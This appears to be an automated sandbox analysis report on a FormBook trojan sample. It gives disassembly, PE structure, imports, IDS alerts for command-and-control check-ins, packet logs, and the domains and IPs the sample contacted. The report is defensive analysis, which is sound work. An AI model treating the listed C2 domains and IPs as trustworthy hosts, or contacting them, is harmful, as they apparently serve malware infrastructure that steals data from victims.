                                                                      call dword ptr [004080BCh]
                                                                      and eax, BFFFFFFFh
                                                                      cmp ax, 00000006h
                                                                      mov dword ptr [0042F42Ch], eax
                                                                      je 00007FE4D08F1223h
                                                                      push ebx
                                                                      call 00007FE4D08F4386h
                                                                      cmp eax, ebx
                                                                      je 00007FE4D08F1219h
                                                                      push 00000C00h
                                                                      call eax
                                                                      mov esi, 004082A0h
                                                                      push esi
                                                                      call 00007FE4D08F4302h
                                                                      push esi
                                                                      call dword ptr [004080CCh]
                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                      cmp byte ptr [esi], bl
                                                                      jne 00007FE4D08F11FDh
                                                                      push 0000000Bh
                                                                      call 00007FE4D08F435Ah
                                                                      push 00000009h
                                                                      call 00007FE4D08F4353h
                                                                      push 00000007h
                                                                      mov dword ptr [0042F424h], eax
                                                                      call 00007FE4D08F4347h
                                                                      cmp eax, ebx
                                                                      je 00007FE4D08F1221h
                                                                      push 0000001Eh
                                                                      call eax
                                                                      test eax, eax
                                                                      je 00007FE4D08F1219h
                                                                      or byte ptr [0042F42Fh], 00000040h
                                                                      push ebp
                                                                      call dword ptr [00408038h]
                                                                      push ebx
                                                                      call dword ptr [00408288h]
                                                                      mov dword ptr [0042F4F8h], eax
                                                                      push ebx
                                                                      lea eax, dword ptr [esp+38h]
                                                                      push 00000160h
                                                                      push eax
                                                                      push ebx
                                                                      push 00429850h
                                                                      call dword ptr [0040816Ch]
                                                                      push 0040A188h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                      Data Directories

                                                                      Name                                  Virtual Address   Virtual Size   Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x8544            0xa0           .rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x38000           0x21248        .rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS             0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT             0x8000            0x29c          .rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0               0x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0               0x0

                                                                      Sections

                                                                      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                                                                      .text   0x1000           0x6457        0x6600    False     0.66823682598    data       6.43498570321  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rdata  0x8000           0x1380        0x1400    False     0.4625           data       5.26100389731  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data   0xa000           0x25538       0x600     False     0.463541666667   data       4.133728555    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .ndata  0x30000          0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc   0x38000          0x21248       0x21400   False     0.430987135808   data       6.43392115595  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      Name           RVA      Size     Type                                                                                                                                              Language  Country
                                                                      RT_ICON        0x38280  0x10828  data                                                                                                                                              English   United States
                                                                      RT_ICON        0x48aa8  0x849d   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                                                                       English   United States
                                                                      RT_ICON        0x50f48  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4293848814, next used block 4294638330    English   United States
                                                                      RT_ICON        0x55170  0x25a8   dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294046193, next used block 4294638330                       English   United States
                                                                      RT_ICON        0x57718  0x10a8   dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294309365, next used block 4294375158                       English   United States
                                                                      RT_ICON        0x587c0  0x468    GLS_BINARY_LSB_FIRST                                                                                                                              English   United States
                                                                      RT_DIALOG      0x58c28  0x100    data                                                                                                                                              English   United States
                                                                      RT_DIALOG      0x58d28  0x11c    data                                                                                                                                              English   United States
                                                                      RT_DIALOG      0x58e48  0x60     data                                                                                                                                              English   United States
                                                                      RT_GROUP_ICON  0x58ea8  0x5a     data                                                                                                                                              English   United States
                                                                      RT_MANIFEST    0x58f08  0x340    XML 1.0 document, ASCII text, with very long lines, with no line terminators                                                                      English   United States

                                                                      Imports

                                                                      DLL: Imported functions
                                                                      ADVAPI32.dll: RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                      SHELL32.dll: SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                      ole32.dll: IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                      COMCTL32.dll: ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                      USER32.dll: SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                      GDI32.dll: SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                      KERNEL32.dll: GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/12/21-06:10:52.777667 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49716 | 75.2.115.196 | 192.168.2.5
05/12/21-06:10:57.964155 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 91.148.168.141
05/12/21-06:10:57.964155 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 91.148.168.141
05/12/21-06:10:57.964155 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 91.148.168.141
05/12/21-06:10:58.051840 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49717 | 91.148.168.141 | 192.168.2.5
05/12/21-06:11:08.305754 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.5 | 62.149.189.71
05/12/21-06:11:08.305754 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.5 | 62.149.189.71
05/12/21-06:11:08.305754 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.5 | 62.149.189.71
05/12/21-06:11:13.647635 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49719 | 23.227.38.74 | 192.168.2.5
05/12/21-06:11:18.796605 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 85.233.160.22
05/12/21-06:11:18.796605 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 85.233.160.22
05/12/21-06:11:18.796605 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 85.233.160.22
05/12/21-06:11:30.171286 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 8.210.40.49
05/12/21-06:11:30.171286 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 8.210.40.49
05/12/21-06:11:30.171286 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 8.210.40.49
05/12/21-06:11:45.772072 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 34.102.136.180
05/12/21-06:11:45.772072 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 34.102.136.180
05/12/21-06:11:45.772072 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 34.102.136.180
05/12/21-06:11:45.909532 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49727 | 34.102.136.180 | 192.168.2.5

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 06:10:52.578253031 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.618907928 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.620045900 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.620214939 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.660700083 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.777667046 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.777733088 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.778031111 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.778270006 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.807538986 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:52.807683945 CEST | 49716 | 80 | 192.168.2.5 | 75.2.115.196
May 12, 2021 06:10:52.818757057 CEST | 80 | 49716 | 75.2.115.196 | 192.168.2.5
May 12, 2021 06:10:57.887156010 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:57.963726997 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:10:57.963977098 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:57.964154959 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:58.044265032 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:10:58.051840067 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:10:58.051858902 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:10:58.052031040 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:58.052119970 CEST | 49717 | 80 | 192.168.2.5 | 91.148.168.141
May 12, 2021 06:10:58.128576040 CEST | 80 | 49717 | 91.148.168.141 | 192.168.2.5
May 12, 2021 06:11:08.246844053 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.305356979 CEST | 80 | 49718 | 62.149.189.71 | 192.168.2.5
May 12, 2021 06:11:08.305533886 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.305753946 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.362505913 CEST | 80 | 49718 | 62.149.189.71 | 192.168.2.5
May 12, 2021 06:11:08.363512993 CEST | 80 | 49718 | 62.149.189.71 | 192.168.2.5
May 12, 2021 06:11:08.363538980 CEST | 80 | 49718 | 62.149.189.71 | 192.168.2.5
May 12, 2021 06:11:08.363763094 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.363837004 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:08.665510893 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:09.275211096 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:10.478286028 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:12.884835958 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:13.437242985 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.482142925 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.482316017 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.482528925 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.526175022 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647634983 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647696972 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647722960 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647748947 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647768021 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.647921085 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.648022890 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.648037910 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.648087978 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:13.651108027 CEST | 80 | 49719 | 23.227.38.74 | 192.168.2.5
May 12, 2021 06:11:13.651184082 CEST | 49719 | 80 | 192.168.2.5 | 23.227.38.74
May 12, 2021 06:11:17.697598934 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:18.743036985 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
May 12, 2021 06:11:18.795769930 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:18.796403885 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
May 12, 2021 06:11:18.796605110 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
May 12, 2021 06:11:18.848905087 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:18.849797010 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:18.849983931 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:18.850141048 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
May 12, 2021 06:11:18.850188017 CEST | 49720 | 80 | 192.168.2.5 | 85.233.160.22
May 12, 2021 06:11:18.904484034 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:24.164902925 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:24.480098009 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:24.480214119 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:24.480335951 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:24.793428898 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:24.793498039 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:24.793528080 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:24.793703079 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:24.795022964 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:25.107990026 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:27.307744980 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:29.894157887 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.170943022 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:30.171107054 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.171286106 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.447992086 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:30.448025942 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:30.448041916 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:30.448206902 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.448276997 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.725559950 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:45.730526924 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.771503925 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
May 12, 2021 06:11:45.771606922 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.772072077 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.813093901 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
May 12, 2021 06:11:45.909532070 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
May 12, 2021 06:11:45.909596920 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
May 12, 2021 06:11:45.909837008 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.909900904 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.950901031 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 06:09:34.283843994 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:34.335406065 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:34.902295113 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:34.959502935 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:35.709083080 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:35.762042999 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:37.292479992 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:37.341233015 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:37.589746952 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:37.649698973 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:39.478003025 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:39.526659012 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:40.772716045 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:40.821523905 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:42.004847050 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:42.053600073 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:43.216428995 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:43.265111923 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:45.508809090 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:45.557526112 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:47.106349945 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:47.157958031 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:48.625264883 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:48.673979998 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:49.491476059 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:49.551354885 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:00.726229906 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:00.786649942 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:21.639175892 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:21.707287073 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:49.304970980 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:49.363789082 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:52.420631886 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:52.571346045 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:57.795087099 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:57.885720015 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:03.061557055 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:03.124828100 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:08.172087908 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:08.245578051 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:13.373060942 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:13.436161995 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:18.654652119 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:18.741679907 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:20.400882006 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:20.475410938 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:22.926269054 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:22.985301018 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:23.877700090 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:24.163995981 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:29.830585957 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:29.892627001 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:35.455265045 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:35.520087004 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:40.179445982 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:40.244952917 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:40.564667940 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:40.639816046 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:45.658201933 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:45.726883888 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:50.920507908 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:51.080497026 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:56.217856884 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:56.303303003 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 12, 2021 06:10:52.420631886 CEST | 192.168.2.5 | 8.8.8.8 | 0xbbd8 | Standard query (0) | www.roastedorganic.com | A (IP address) | IN (0x0001)
May 12, 2021 06:10:57.795087099 CEST | 192.168.2.5 | 8.8.8.8 | 0xe9dd | Standard query (0) | www.voiceclubdubai.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:03.061557055 CEST | 192.168.2.5 | 8.8.8.8 | 0x469b | Standard query (0) | www.w-c727or.net | A (IP address) | IN (0x0001)
May 12, 2021 06:11:08.172087908 CEST | 192.168.2.5 | 8.8.8.8 | 0xbc63 | Standard query (0) | www.geacasolaro.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:13.373060942 CEST | 192.168.2.5 | 8.8.8.8 | 0x4d71 | Standard query (0) | www.charmboutiques.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:18.654652119 CEST | 192.168.2.5 | 8.8.8.8 | 0x3c70 | Standard query (0) | www.websitemax.co.uk | A (IP address) | IN (0x0001)
May 12, 2021 06:11:23.877700090 CEST | 192.168.2.5 | 8.8.8.8 | 0x73a4 | Standard query (0) | www.year-action.xyz | A (IP address) | IN (0x0001)
May 12, 2021 06:11:29.830585957 CEST | 192.168.2.5 | 8.8.8.8 | 0x6819 | Standard query (0) | www.hdjakdhf.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:35.455265045 CEST | 192.168.2.5 | 8.8.8.8 | 0xa038 | Standard query (0) | www.kantan-sedori.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:40.564667940 CEST | 192.168.2.5 | 8.8.8.8 | 0x59cb | Standard query (0) | www.shanghainternational.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:45.658201933 CEST | 192.168.2.5 | 8.8.8.8 | 0x88a8 | Standard query (0) | www.susanestuart.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:50.920507908 CEST | 192.168.2.5 | 8.8.8.8 | 0x80de | Standard query (0) | www.algaeflipflops.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:56.217856884 CEST | 192.168.2.5 | 8.8.8.8 | 0x2892 | Standard query (0) | www.thelordnelsonwinthorpe.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 12, 2021 06:10:52.571346045 CEST | 8.8.8.8 | 192.168.2.5 | 0xbbd8 | No error (0) | www.roastedorganic.com | - | 75.2.115.196 | A (IP address) | IN (0x0001)
